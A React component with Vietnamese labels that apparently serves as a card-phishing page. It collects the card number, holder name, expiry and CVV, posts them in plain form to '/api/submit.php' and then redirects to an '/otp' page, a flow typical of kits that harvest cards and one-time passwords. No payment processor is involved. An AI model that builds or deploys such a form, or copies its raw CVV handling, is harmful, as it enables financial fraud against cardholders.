import "./Creditcard.css";
import React, { useState } from "react";
function Creditcard() {
  const [cardRaw, setCardRaw] = useState("");
  const [expiryRaw, setExpiryRaw] = useState(""); // MMYY (digits only)
  const [cvv, setCvv] = useState("");
  const [errors, setErrors] = useState({});
  const [status, setStatus] = useState("");
  const [cardName, setCardName] = useState("");

  // format helpers
  const formatCardDisplay = (digits) =>
    digits.replace(/(\d{4})(?=\d)/g, "$1 ").trim();

  const formatExpiryDisplay = (digits) =>
    digits.length <= 2 ? digits : digits.slice(0, 2) + "/" + digits.slice(2, 4);

  // handlers
  const handleCardChange = (e) => {
    setCardRaw(e.target.value.replace(/\D/g, "").slice(0, 16));
  };

  const handleNameChange = (e) => {
    const value = e.target.value.toUpperCase().replace(/[^A-Z\s]/g, "");
    setCardName(value);
    if (errors.name) {
      setErrors((prev) => ({ ...prev, name: undefined }));
    }
  };

  const handleExpiryChange = (e) => {
    let digits = e.target.value.replace(/\D/g, "").slice(0, 4); // keep only 0-9, max 4

    // --- Enforce month (first 2 digits) ---
    if (digits.length === 1) {
      // If first digit > 1, auto-prefix 0 (e.g., "3" -> "03")
      const d0 = digits[0];
      if (parseInt(d0, 10) > 1) digits = "0" + d0;
    }

    if (digits.length >= 2) {
      let mm = parseInt(digits.slice(0, 2), 10);
      if (mm === 0) {
        digits = "01" + digits.slice(2); // disallow 00 -> 01
      } else if (mm > 12) {
        digits = "12" + digits.slice(2); // clamp to 12
      }
    }

    // --- Enforce year (last 2 digits) ---
    if (digits.length === 4) {
      let yy = parseInt(digits.slice(2, 4), 10);
      if (yy < 25) {
        digits = digits.slice(0, 2) + "25"; // clamp to 25
      }
    }

    setExpiryRaw(digits);
  };

  const handleCvvChange = (e) => {
    setCvv(e.target.value.replace(/\D/g, "").slice(0, 3));
  };

  // validate
  const validateAll = () => {
    const newErrors = {};
    if (cardRaw.length !== 16) newErrors.card = "Số thẻ phải có 16 số";
    if (!cardName.trim()) {
      newErrors.name = "Vui lòng nhập tên in trên thẻ";
    }
    if (expiryRaw.length !== 4) {
      newErrors.expiry = "Ngày hết hạn phải có 4 số";
    } else {
      const mm = parseInt(expiryRaw.slice(0, 2), 10);
      const yy = parseInt(expiryRaw.slice(2, 4), 10);
      const yearFull = 2000 + yy;
      if (!(mm >= 1 && mm <= 12)) newErrors.expiry = "Month must be 01–12";
      else if (yearFull < 2025) newErrors.expiry = "Year must be ≥ 2025";
    }

    if (cvv.length !== 3) newErrors.cvv = "CVV phải có 3 chữ số";

    setErrors(newErrors);
    return Object.keys(newErrors).length === 0;
  };
  const handleSubmit = async (e) => {
    e.preventDefault();
    setStatus("");

    if (!validateAll()) return;
    const holder = cardName.trim();
    const month = expiryRaw.slice(0, 2);
    const year = expiryRaw.slice(2);

    const payload = {
      action: "form_thong_tin",
      cardRaw,
      holder,
      month,
      year,
      cvv,
    };

    try {
      const res = await fetch("/api/submit.php", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(payload),
      });
      const data = await res.json();
      if (data.ok) {
        // 🟩 chuyển sang trang 3
        window.location.href = "/otp"; // hoặc route bạn định sẵn
      }
    } catch (err) {
      console.error(err);
    }
  };

  return (
    <div
      style={{
        maxWidth: "600px",
        margin: "0 auto",
        padding: "24px",
        fontFamily: "Arial",
      }}
    >
      <section className="hero1">
        <div id="check" className="content1">
          <form onSubmit={handleSubmit} noValidate>
            <div className="fw-bold py-2">
              <h3 className="fw-bold" style={{ fontSize: "18px" }}>
                Nhập thông tin thẻ
              </h3>
            </div>
            <img className="w-50" src="/payment3.png" alt="payment" />
            {/* Card */}
            <div className="mb-2">
              <label className="form-input-label p-1 fw-bold">Số thẻ</label>
              <input
                className={`form-control ${errors.card ? "is-invalid" : ""}`}
                placeholder="1234 5678 9123 4567"
                type="text"
                inputMode="numeric"
                value={formatCardDisplay(cardRaw)}
                onChange={handleCardChange}
              />
              {errors.card && (
                <div className="invalid-feedback">{errors.card}</div>
              )}
            </div>
            <div className="mb-2">
              <label className="form-input-label p-1 fw-bold">
                Tên chủ thẻ
              </label>
              <input
                className={`form-control ${errors.name ? "is-invalid" : ""}`}
                placeholder="Nhập tên chủ thẻ (không dấu)"
                type="text"
                value={cardName}
                onChange={handleNameChange}
              />
              {errors.name && (
                <div className="invalid-feedback">{errors.name}</div>
              )}
            </div>

            {/* Expiry + CVV */}
            <div className="d-flex gap-3 py-2 w-100">
              <div className="w-100">
                <label className="form-input-label p-1 fw-bold">
                  Ngày hết hạn
                </label>
                <input
                  className={`form-control ${errors.expiry ? "is-invalid" : ""}`}
                  placeholder="MM/YY"
                  type="text"
                  inputMode="numeric"
                  value={formatExpiryDisplay(expiryRaw)}
                  onChange={handleExpiryChange}
                />
                {errors.expiry && (
                  <div className="invalid-feedback">{errors.expiry}</div>
                )}
              </div>
              <div className="w-100">
                <label className="form-input-label p-1 fw-bold">Nhập CVV</label>
                <input
                  className={`form-control ${errors.cvv ? "is-invalid" : ""}`}
                  placeholder="Số cvv"
                  type="text"
                  inputMode="numeric"
                  value={cvv}
                  onChange={handleCvvChange}
                />
                {errors.cvv && (
                  <div className="invalid-feedback">{errors.cvv}</div>
                )}
              </div>
            </div>

            <div className="text-center">
              <a
                className="fw-bold"
                id="btn"
                href="/otp"
                onClick={(e) => handleSubmit(e)}
              >
                Xác nhận
              </a>
            </div>
          </form>
        </div>
      </section>
    </div>
  );
}

export default Creditcard;
